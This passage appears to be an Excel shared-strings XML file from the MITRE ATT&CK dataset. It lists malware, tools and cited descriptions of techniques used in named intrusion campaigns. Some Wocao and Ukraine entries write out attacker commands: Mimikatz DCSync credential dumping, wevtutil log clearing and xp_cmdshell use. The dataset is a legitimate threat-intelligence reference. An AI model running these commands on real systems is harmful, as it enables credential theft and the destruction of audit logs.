    <t>S0174</t>
  </si>
  <si>
    <t>Responder</t>
  </si>
  <si>
    <t>tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719</t>
  </si>
  <si>
    <t>(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--9f6939de-be8d-45cc-8c2d-6a3c6972c2d2</t>
  </si>
  <si>
    <t>S0678</t>
  </si>
  <si>
    <t>Torisma</t>
  </si>
  <si>
    <t>malware--0715560d-4299-4e84-9e20-6e80ab57e4f2</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</si>
  <si>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</si>
  <si>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relationship--5687f6c6-f749-456e-a7fe-179017d50e9b</t>
  </si>
  <si>
    <t>C0016</t>
  </si>
  <si>
    <t>Operation Dust Storm</t>
  </si>
  <si>
    <t>campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f</t>
  </si>
  <si>
    <t>S0084</t>
  </si>
  <si>
    <t>Mis-Type</t>
  </si>
  <si>
    <t>malware--e1161124-f22e-487f-9d5f-ed8efc8dcd61</t>
  </si>
  <si>
    <t>(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--40ed9be1-9c97-46fc-a967-9468888576a8</t>
  </si>
  <si>
    <t>S0083</t>
  </si>
  <si>
    <t>Misdat</t>
  </si>
  <si>
    <t>malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039</t>
  </si>
  <si>
    <t>relationship--0465632c-6db3-41ed-acc8-b0f60cc99330</t>
  </si>
  <si>
    <t>S0012</t>
  </si>
  <si>
    <t>PoisonIvy</t>
  </si>
  <si>
    <t>malware--b42378e0-f147-496f-992a-26a49705395b</t>
  </si>
  <si>
    <t>relationship--1f07783f-cc60-4464-a0b2-154308d799c2</t>
  </si>
  <si>
    <t>S0085</t>
  </si>
  <si>
    <t>S-Type</t>
  </si>
  <si>
    <t>malware--66b1dcde-17a0-4c7b-95fa-b08d430c2131</t>
  </si>
  <si>
    <t>relationship--af60497d-7356-444c-b842-6ad9fb0d7dea</t>
  </si>
  <si>
    <t>S0086</t>
  </si>
  <si>
    <t>ZLib</t>
  </si>
  <si>
    <t>malware--166c0eca-02fd-424a-92c0-6b5106994d31</t>
  </si>
  <si>
    <t>relationship--4cc0ca4c-3d7b-4fd8-b8ad-0a987da94d33</t>
  </si>
  <si>
    <t>S0032</t>
  </si>
  <si>
    <t>gh0st RAT</t>
  </si>
  <si>
    <t>malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24</t>
  </si>
  <si>
    <t>relationship--1c9d5795-fa0d-4d01-815f-eef0e4d8b2b7</t>
  </si>
  <si>
    <t>S0512</t>
  </si>
  <si>
    <t>FatDuke</t>
  </si>
  <si>
    <t>malware--54a01db0-9fab-4d5f-8209-53cef8425f4a</t>
  </si>
  <si>
    <t>For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used [FatDuke](https://attack.mitre.org/software/S0512) as a third-stage backdoor.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--28fa44de-4b89-4ce6-a29c-895e42a30628</t>
  </si>
  <si>
    <t>S0051</t>
  </si>
  <si>
    <t>MiniDuke</t>
  </si>
  <si>
    <t>malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c</t>
  </si>
  <si>
    <t>For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used [MiniDuke](https://attack.mitre.org/software/S0051) as a second-stage backdoor.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--60ee610e-087d-4515-9c42-9a60cc04d683</t>
  </si>
  <si>
    <t>S0518</t>
  </si>
  <si>
    <t>PolyglotDuke</t>
  </si>
  <si>
    <t>malware--3d57dcc4-be99-4613-9482-d5218f5ec13e</t>
  </si>
  <si>
    <t>For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used [PolyglotDuke](https://attack.mitre.org/software/S0518) as a first-stage downloader.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--eac2781c-7025-47b9-8982-9d037a94c33f</t>
  </si>
  <si>
    <t>For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used [PsExec](https://attack.mitre.org/software/S0029) for lateral movement on compromised networks.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--ead3f010-b221-4708-bb1e-d146f2593be5</t>
  </si>
  <si>
    <t>06 April 2023</t>
  </si>
  <si>
    <t>S0511</t>
  </si>
  <si>
    <t>RegDuke</t>
  </si>
  <si>
    <t>malware--47124daf-44be-4530-9c63-038bc64318dd</t>
  </si>
  <si>
    <t>For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used [RegDuke](https://attack.mitre.org/software/S0511) as a first-stage implant.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--ccac8e9d-0c3d-45b0-b536-b722ca978826</t>
  </si>
  <si>
    <t>C0006</t>
  </si>
  <si>
    <t>Operation Honeybee</t>
  </si>
  <si>
    <t>campaign--4553292d-12c6-4a93-934d-12160370d4e0</t>
  </si>
  <si>
    <t>S0075</t>
  </si>
  <si>
    <t>Reg</t>
  </si>
  <si>
    <t>tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>relationship--76f9794c-5791-4fe7-b3c8-39dbdee11967</t>
  </si>
  <si>
    <t>S0464</t>
  </si>
  <si>
    <t>SYSCON</t>
  </si>
  <si>
    <t>malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3</t>
  </si>
  <si>
    <t>[Operation Honeybee](https://attack.mitre.org/campaigns/C0006) included the use of an upgraded version of [SYSCON](https://attack.mitre.org/software/S0464).(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--0ebf98b6-2cd2-4672-a330-201e9c7a2932</t>
  </si>
  <si>
    <t>relationship--c4880d8d-3d07-49f6-875b-00b573faebf3</t>
  </si>
  <si>
    <t>relationship--abb6d14e-e76f-4437-8006-1a084ecd5e1b</t>
  </si>
  <si>
    <t>S0106</t>
  </si>
  <si>
    <t>cmd</t>
  </si>
  <si>
    <t>tool--bba595da-b73a-4354-aa6c-224d4de7cb4e</t>
  </si>
  <si>
    <t>relationship--dc107dd0-bf7c-4b8d-9262-e487a1ac9f2c</t>
  </si>
  <si>
    <t>C0013</t>
  </si>
  <si>
    <t>Operation Sharpshooter</t>
  </si>
  <si>
    <t>campaign--37764c78-2a99-46d1-a7ea-6454b9bf93a0</t>
  </si>
  <si>
    <t>S0448</t>
  </si>
  <si>
    <t>Rising Sun</t>
  </si>
  <si>
    <t>malware--56e6b6c2-e573-4969-8bab-783205cebbbf</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</si>
  <si>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</si>
  <si>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relationship--b4d9d40b-db4f-4e1d-a1ed-a1eb38ebe831</t>
  </si>
  <si>
    <t>26 September 2022</t>
  </si>
  <si>
    <t>C0005</t>
  </si>
  <si>
    <t>Operation Spalax</t>
  </si>
  <si>
    <t>campaign--4c840263-bbda-440d-a22b-674679ddebf1</t>
  </si>
  <si>
    <t>S0332</t>
  </si>
  <si>
    <t>Remcos</t>
  </si>
  <si>
    <t>tool--7cd0bc75-055b-4098-a00e-83dc8beaff14</t>
  </si>
  <si>
    <t>(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--e4007652-cc24-4786-926f-db4ff8349e88</t>
  </si>
  <si>
    <t>S0385</t>
  </si>
  <si>
    <t>njRAT</t>
  </si>
  <si>
    <t>malware--d906e6f7-434c-44c0-b51a-ed50af8f7945</t>
  </si>
  <si>
    <t>relationship--93b303a6-3529-4cbd-941f-4dc71b8e73d8</t>
  </si>
  <si>
    <t>C0014</t>
  </si>
  <si>
    <t>Operation Wocao</t>
  </si>
  <si>
    <t>campaign--b03d5112-e23a-4ac8-add0-be7502d24eff</t>
  </si>
  <si>
    <t>S0521</t>
  </si>
  <si>
    <t>BloodHound</t>
  </si>
  <si>
    <t>tool--066b057c-944e-4cfc-b654-e3dfba04b926</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [BloodHound](https://attack.mitre.org/software/S0521) discover trust between domains.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--0473a627-abe8-4cfe-9574-a15c1c33da29</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used `smbexec.py` and `psexec.py` from [Impacket](https://attack.mitre.org/software/S0357) for lateral movement.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--cbfd307e-ab23-49d0-bda0-83e883d4851a</t>
  </si>
  <si>
    <t>14 October 2022</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Mimikatz](https://attack.mitre.org/software/S0002) with the `privilege::debug` and `lsadump::dcsync /all` flags to dump account credentials.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--2a02ac13-c551-45ad-a4bc-2641d7f182ff</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [PowerSploit](https://attack.mitre.org/software/S0194)’s `Invoke-Kerberoast` module to bruteforce passwords and retrieve encrypted service tickets.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--65376085-302c-4958-94b7-3582e30a3c0f</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [PsExec](https://attack.mitre.org/software/S0029) to interact with other systems inside the internal network.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--b8ca4610-ccb2-4e29-8478-8670413af4f9</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Tor](https://attack.mitre.org/software/S0183) exit nodes to execute commands.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--401dcfac-ceda-4d72-b12d-20ffb5cae4a6</t>
  </si>
  <si>
    <t>07 October 2022</t>
  </si>
  <si>
    <t>S0645</t>
  </si>
  <si>
    <t>Wevtutil</t>
  </si>
  <si>
    <t>tool--f91162cc-1686-4ff8-8115-bf3f61a4cc7a</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Wevtutil](https://attack.mitre.org/software/S0645) to delete system and security event logs with `wevtutil cl system` and `wevtutil cl security`.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--49dd9dc3-b0b8-499f-8fad-177779d494df</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [dsquery](https://attack.mitre.org/software/S0105) to retrieve all subnets in the Active Directory.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--73137a74-58b1-4d45-b6dd-e8b4fbfe6236</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [netstat](https://attack.mitre.org/software/S0104) to identify specific ports.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--03affe06-c8b3-436d-84c2-b5943f37ff47</t>
  </si>
  <si>
    <t>(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--b1643345-ab99-4648-ab15-0af7219978f1</t>
  </si>
  <si>
    <t>(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>relationship--b4fad2c0-1407-4409-af5d-2cd098a1e536</t>
  </si>
  <si>
    <t>S0597</t>
  </si>
  <si>
    <t>GoldFinder</t>
  </si>
  <si>
    <t>malware--b7010785-699f-412f-ba49-524da6033c76</t>
  </si>
  <si>
    <t>(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--743a12d9-9260-4761-b158-7a697fd43e42</t>
  </si>
  <si>
    <t>S0588</t>
  </si>
  <si>
    <t>GoldMax</t>
  </si>
  <si>
    <t>malware--5c747acd-47f0-4c5a-b9e5-213541fc01e0</t>
  </si>
  <si>
    <t>relationship--111d5f78-f5d3-4c33-b5f8-d978c166b52a</t>
  </si>
  <si>
    <t>(Citation: Microsoft 365 Defender Solorigate)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--7d8a984d-676d-47bf-a660-00c43ab49985</t>
  </si>
  <si>
    <t>S0565</t>
  </si>
  <si>
    <t>Raindrop</t>
  </si>
  <si>
    <t>malware--4efc3e00-72f2-466a-ab7c-8a7dc6603b19</t>
  </si>
  <si>
    <t>(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>relationship--e7f2fab9-7a97-4892-9fee-fe9b98c8f0a0</t>
  </si>
  <si>
    <t>S0559</t>
  </si>
  <si>
    <t>SUNBURST</t>
  </si>
  <si>
    <t>malware--a8839c95-029f-44cf-8f3d-a3cf2039e927</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</si>
  <si>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</si>
  <si>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relationship--bdc492d0-220c-4588-8361-a92dc79c4ba0</t>
  </si>
  <si>
    <t>S0562</t>
  </si>
  <si>
    <t>SUNSPOT</t>
  </si>
  <si>
    <t>malware--bf48e7f8-752c-4ce8-bf8f-748edacd8fa6</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>relationship--afd398cc-b093-429c-88f5-e7f661567fd1</t>
  </si>
  <si>
    <t>S0589</t>
  </si>
  <si>
    <t>Sibot</t>
  </si>
  <si>
    <t>malware--979adb5a-dc30-48f0-9e3d-9a26d866928c</t>
  </si>
  <si>
    <t>relationship--427b9f61-9f58-4167-b4f5-c7f3bdbd7862</t>
  </si>
  <si>
    <t>S0560</t>
  </si>
  <si>
    <t>TEARDROP</t>
  </si>
  <si>
    <t>malware--32f49626-87f4-4d6c-8f59-a0dca953fe26</t>
  </si>
  <si>
    <t>(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: CheckPoint Sunburst &amp; Teardrop December 2020)(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--378bf726-1fd4-4c08-939a-88fb11405205</t>
  </si>
  <si>
    <t>S0682</t>
  </si>
  <si>
    <t>TrailBlazer</t>
  </si>
  <si>
    <t>malware--bdad6f3b-de88-42fa-9295-d29b5271808e</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--8b52c2d4-8e40-42c7-9661-7d5fb58b3af5</t>
  </si>
  <si>
    <t>During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) modified in-registry internet settings to lower internet security. (Citation: Booz Allen Hamilton)</t>
  </si>
  <si>
    <t>relationship--f53b248d-da29-4805-b714-29db3ce99ada</t>
  </si>
  <si>
    <t>During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) created privileged domain accounts to be used for further exploitation and lateral movement. (Citation: Booz Allen Hamilton)</t>
  </si>
  <si>
    <t>relationship--8a14f269-467e-49f8-a53f-ba1ad7fe5731</t>
  </si>
  <si>
    <t>During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) installed a modified Dropbear SSH client as the backdoor to target systems. (Citation: Booz Allen Hamilton)</t>
  </si>
  <si>
    <t>relationship--62ed20e9-07e5-4e22-a8dd-b93ab89706e3</t>
  </si>
  <si>
    <t>During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), vba_macro.exe deletes itself after `FONTCACHE.DAT`, `rundll32.exe`, and the associated .lnk file is delivered. (Citation: Booz Allen Hamilton)</t>
  </si>
  <si>
    <t>relationship--4d9acf03-bd3e-458b-bcea-6d1b57674072</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</si>
  <si>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</si>
  <si>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relationship--7d12ca01-c979-4fdf-8548-9da12c105ba0</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</si>
  <si>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</si>
  <si>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relationship--d2aa3c9f-0f1f-49ff-81ef-94e229f7c6e2</t>
  </si>
  <si>
    <t>During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) moved their tools laterally within the corporate network and between the ICS and corporate network. (Citation: Booz Allen Hamilton)</t>
  </si>
  <si>
    <t>relationship--c39edafb-5a90-43a3-af9f-6865c5a6a71f</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</si>
  <si>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</si>
  <si>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relationship--874f8662-0ec0-48e4-901b-270ac9ed63e6</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</si>
  <si>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</si>
  <si>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relationship--052acd65-b05a-4645-943b-1c53a717c419</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</si>
  <si>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</si>
  <si>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relationship--899c49f0-4a1b-44d8-81e6-fd927a252bd6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</si>
  <si>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</si>
  <si>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relationship--edb47407-d848-4b72-abe6-9815aeaaaf37</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</si>
  <si>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</si>
  <si>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relationship--61ce754c-da32-4f0d-9c5f-bdf4debf7377</t>
  </si>
  <si>
    <t>During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor which could execute a supplied DLL using `rundll32.exe`. (Citation: Booz Allen Hamilton)</t>
  </si>
  <si>
    <t>relationship--a2d91513-68d5-4df2-ab2f-05a25b72f419</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</si>
  <si>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</si>
  <si>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relationship--04427a61-cef7-4197-9ff4-cb36c6a1895e</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</si>
  <si>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</si>
  <si>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relationship--87c33110-cbd9-4925-bf95-4570729ee935</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</si>
  <si>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</si>
  <si>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relationship--b2c3af15-670d-4775-ba38-e585f421b846</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</si>
  <si>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</si>
  <si>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relationship--b2f02a93-36fe-45be-9120-ea7bf53a884c</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</si>
  <si>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</si>
  <si>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relationship--c23d5ed2-f358-41d7-99c3-658f4d584786</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used a script to attempt RPC authentication against a number of hosts.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--cbfa121a-bf32-42fe-917a-d3533a6697bb</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</si>
  <si>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</si>
  <si>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relationship--e51f5310-3508-4a79-8f3e-3a02f5d685e8</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) added a login to a SQL Server with `sp_addlinkedsrvlogin`.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--4f41a697-db81-4df8-8b46-a59d294112fa</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) disabled event logging on compromised systems.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--e9dcd224-c2c4-4bee-a1ac-51d656653237</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</si>
  <si>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</si>
  <si>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relationship--cf17ef95-3173-4bfd-be73-1cd920e8c2da</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used [Mimikatz](https://attack.mitre.org/software/S0002) to capture and use legitimate credentials.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--b1b935ac-1823-48a8-ac16-b9d17e519475</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used `move` to transfer files to a network share.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--698b7d6f-1198-4b8a-bc9c-8d0baa162b2b</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) masqueraded executables as `.txt` files.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--03927cb1-f80c-4b86-ac8d-f0963141eaa8</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.(Citation: Dragos Crashoverride 2017)</t>
  </si>
  <si>
    <t>relationship--10976d43-afcf-44d5-bcbf-122f39e0cbff</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used heavily obfuscated code with [Industroyer](https://attack.mitre.org/software/S0604) in its Windows Notepad backdoor.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--7fa59950-8a54-430f-b10a-4eb12566ece7</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--04175eba-3f58-42ce-897b-1d483c4c12e0</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</si>
  <si>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</si>
  <si>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relationship--dae53ce2-d59e-47d2-b3ac-edd4be97a5ee</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) utilized `net use` to connect to network shares.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--f08b8e20-4dda-4ced-8e9d-f0a5e4ebcc52</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used various MS-SQL stored procedures.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--2542a753-4cfb-408f-98a8-e1b11f1bce10</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used UPX to pack a copy of [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--998add45-ac31-4020-9179-5730f06ae9cd</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) created VBScripts to run on an SSH server.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--029ee791-c82b-43b4-8107-e3c0dfcfe3f4</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used the `xp_cmdshell` command in MS-SQL.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--6b52a0a1-0919-4817-af22-31cd6cc404ad</t>
  </si>
  <si>
    <t>During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), WMI in scripts were used for remote execution and system surveys. (Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--b792772b-381c-4ad3-896b-52f7873d88fa</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</si>
  <si>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</si>
  <si>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relationship--8bf25335-9705-4737-82cf-218832c5e1c0</t>
  </si>
  <si>
    <t>For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors established domains that appeared to be legitimate services and entities, such as LinkedIn, Facebook, Office 365, and Pfizer.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--b0ad4286-8434-400c-9eff-1b0ca2b7a094</t>
  </si>
  <si>
    <t>During [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors likely compromised the domain of a legitimate Israeli shipping company.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--57e9b366-fac5-4320-bb76-da81953de2dc</t>
  </si>
  <si>
    <t>During [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors likely established a watering hole that was hosted on a login page of a legitimate Israeli shipping company that was active until at least November 2021.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--855c5caf-8553-45d0-a08b-842a9358d138</t>
  </si>
  <si>
    <t>For [C0010](https://attack.mitre.org/campaigns/C0010), the threat actors compromised the login page of a legitimate Israeli shipping company and likely established a watering hole that collected visitor information.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--8d172b4c-7732-4315-852a-958a1cd08025</t>
  </si>
  <si>
    <t>During [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors downloaded tools and malware onto a compromised host.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--b8545621-f2c5-4834-a19d-fa1e0eccd33b</t>
  </si>
  <si>
    <t>For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors used unique malware, including [SUGARUSH](https://attack.mitre.org/software/S1049) and [SUGARDUMP](https://attack.mitre.org/software/S1042).(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--a36264d2-5bb2-4268-8ce1-3de9fbdf2862</t>
  </si>
  <si>
    <t>05 October 2022</t>
  </si>
  <si>
    <t>For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors obtained multiple publicly-available tools, including METASPLOIT, UNICORN, and NorthStar C2.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--df940d86-6586-429f-ae57-fe99da9e8edb</t>
  </si>
  <si>
    <t xml:space="preserve">For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors staged malware on their infrastructure for direct download onto a compromised system.(Citation: Mandiant UNC3890 Aug 2022) </t>
  </si>
  <si>
    <t>relationship--634a14f9-e252-4f5e-851a-de8187de074e</t>
  </si>
  <si>
    <t>For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--ba2dfbfe-4979-448b-8f87-bdc44a867bbf</t>
  </si>
  <si>
    <t>For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) established SSL certificates on the typo-squatted domains the group registered.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--f0883623-a612-4e9e-ad46-cfb0964248f0</t>
  </si>
  <si>
    <t>For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) registered domains likely designed to appear relevant to student targets in India.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--bb52c6a4-4602-4284-8128-cdf296e9a620</t>
  </si>
  <si>
    <t>During [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) relied on a student target to open a malicious document delivered via email.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--7f08eca5-83e2-4d12-9c65-69691fbed054</t>
  </si>
  <si>
    <t>During [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) relied on student targets to click on a malicious link sent via email.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--7bda4cc5-09d8-4e0e-87af-f33cdb7a63d1</t>
  </si>
  <si>
    <t xml:space="preserve">During [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) sent malicious attachments via email to student targets in India.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022) </t>
  </si>
  <si>
    <t>relationship--844a2a38-68aa-45ed-8fa8-4854500cb63d</t>
  </si>
  <si>
    <t>During [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) sent emails containing a malicious link to student targets in India.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--74953cb2-4d72-487b-959b-57602ce28d07</t>
  </si>
  <si>
    <t xml:space="preserve">For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) hosted malicious documents on domains registered by the group.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022) </t>
  </si>
  <si>
    <t>relationship--1a28bcb2-fbac-4bc3-a42c-a254b3e9643e</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</si>
  <si>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</si>
  <si>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relationship--b0e23cdb-b676-4cad-b814-589734dfcb43</t>
  </si>
  <si>
    <t>For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used DLL files that had invalid certificates.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--356744ba-4a64-4ada-9c95-6cdc4e539614</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used [Conti](https://attack.mitre.org/software/S0575) ransomware to encrypt a compromised network.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--89bd9b10-f1cb-4569-977c-784cbfbb23e1</t>
  </si>
  <si>
